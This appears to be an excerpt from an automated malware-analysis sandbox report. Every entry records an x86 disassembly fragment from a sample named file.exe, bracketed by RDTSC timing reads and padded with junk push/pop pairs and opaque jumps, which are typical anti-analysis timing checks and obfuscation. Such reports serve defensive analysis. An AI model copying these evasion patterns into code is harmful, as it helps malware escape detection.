Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7BE78 second address: B7BF0F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB8FCCA77BDh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB8FCCA77B8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 cmc 0x0000002a push 00000000h 0x0000002c jmp 00007FB8FCCA77BDh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FB8FCCA77B8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d jnc 00007FB8FCCA77BBh 0x00000053 xchg eax, esi 0x00000054 jmp 00007FB8FCCA77C6h 0x00000059 push eax 0x0000005a pushad 0x0000005b jnp 00007FB8FCCA77B8h 0x00000061 pushad 0x00000062 jbe 00007FB8FCCA77B6h 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7CF7A second address: B7CFA1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007FB8FCD64887h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7CFA1 second address: B7CFA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DF0A second address: B7DF54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a or edi, 1B053CEFh 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D299Ch] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FB8FCD64878h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 sub dword ptr [ebp+1245C6E8h], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 jp 00007FB8FCD64876h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DF54 second address: B7DF67 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8FCCA77B8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7FF8F second address: B7FFC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64880h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FB8FCD6487Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FB8FCD64882h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7FFC5 second address: B7FFCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7E17B second address: B7E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7F12D second address: B7F132 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7E181 second address: B7E1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB8FCD64888h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80FF0 second address: B80FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7E1A0 second address: B7E1A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80FF4 second address: B80FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80FFA second address: B81015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD64887h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81015 second address: B81019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82121 second address: B82127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82127 second address: B8212B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8222F second address: B82233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82233 second address: B8223C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8512D second address: B85132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85132 second address: B85138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85138 second address: B851BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007FB8FCD64888h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FB8FCD64878h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 movzx ebx, cx 0x0000002c pushad 0x0000002d or dword ptr [ebp+122D1EB4h], ebx 0x00000033 mov edi, 251125DEh 0x00000038 popad 0x00000039 push 00000000h 0x0000003b jng 00007FB8FCD6488Fh 0x00000041 push 00000000h 0x00000043 mov di, 22C1h 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851BB second address: B851BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851BF second address: B851C9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851C9 second address: B851CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851CE second address: B851D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851D4 second address: B851E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB8FCCA77BBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B86117 second address: B86121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B880D3 second address: B880E9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jno 00007FB8FCCA77B6h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8905A second address: B890B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FB8FCD6487Ah 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FB8FCD6487Ch 0x00000013 nop 0x00000014 adc ebx, 2D232F5Eh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FB8FCD64878h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 push 00000000h 0x00000038 mov bx, cx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jnl 00007FB8FCD6487Ch 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8AE97 second address: B8AEC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB8FCCA77C0h 0x00000008 jmp 00007FB8FCCA77C1h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8315C second address: B83160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B83160 second address: B83164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B83164 second address: B8316E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8316E second address: B83172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B83172 second address: B83176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8B4CB second address: B8B585 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCCA77B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FB8FCCA77B8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 call 00007FB8FCCA77C8h 0x0000002c pop edi 0x0000002d mov dword ptr [ebp+122D2388h], eax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FB8FCCA77B8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f push 00000000h 0x00000051 mov edi, dword ptr [ebp+1245F3BAh] 0x00000057 xchg eax, esi 0x00000058 jg 00007FB8FCCA77D7h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push edi 0x00000063 pop edi 0x00000064 jmp 00007FB8FCCA77BDh 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8823F second address: B88243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88243 second address: B8824D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8824D second address: B88251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88251 second address: B882CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or di, CE91h 0x0000000d mov edi, dword ptr [ebp+122D242Ch] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FB8FCCA77B8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push edi 0x0000003c jmp 00007FB8FCCA77BAh 0x00000041 pop ebx 0x00000042 mov eax, dword ptr [ebp+122D0CADh] 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007FB8FCCA77B8h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 00000014h 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 push FFFFFFFFh 0x00000064 cld 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 pushad 0x0000006a popad 0x0000006b pushad 0x0000006c popad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8D3A4 second address: B8D3AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B904DC second address: B904E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B904E1 second address: B904E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B904E7 second address: B90501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B90501 second address: B90505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B309B8 second address: B309C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B309C1 second address: B309F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB8FCD64876h 0x0000000a jmp 00007FB8FCD6487Fh 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FB8FCD64887h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94350 second address: B94360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94360 second address: B94370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnc 00007FB8FCD64876h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94370 second address: B9439B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FB8FCCA77B6h 0x0000000c jmp 00007FB8FCCA77BFh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FB8FCCA77BAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B337 second address: B9B37E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB8FCD6487Eh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB8FCD64889h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B37E second address: B9B396 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8FCCA77B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jc 00007FB8FCCA77B6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B396 second address: B9B3B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007FB8FCD64876h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push esi 0x00000012 jo 00007FB8FCD64876h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B3B3 second address: B9B3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B3B7 second address: B9B3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B457 second address: B9B465 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F6EA second address: B9F6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F6F2 second address: B9F6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F85B second address: B9F87A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB8FCD64888h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9FDB6 second address: B9FDBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0094 second address: BA00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB8FCD6487Ah 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00AA second address: BA00B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00B0 second address: BA00B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00B4 second address: BA00E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB8FCCA77C4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00E2 second address: BA00E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5D6A second address: BA5D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5D70 second address: BA5D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8FCD6487Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5D87 second address: BA5D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4779 second address: BA477D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA477D second address: BA4789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4789 second address: BA4799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4799 second address: BA47C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FB8FCCA77D7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA47C9 second address: BA47DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Bh 0x00000009 jbe 00007FB8FCD64876h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4909 second address: BA4916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jc 00007FB8FCCA77B6h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4916 second address: BA491C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA491C second address: BA4920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4920 second address: BA492E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB8FCD6487Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4B9F second address: BA4BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C6h 0x00000009 pop edi 0x0000000a jns 00007FB8FCCA77BCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5492 second address: BA5498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA563C second address: BA5640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5640 second address: BA5646 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5646 second address: BA566A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FB8FCCA77C8h 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA566A second address: BA5670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5739E second address: B573A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FB8FCCA77B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
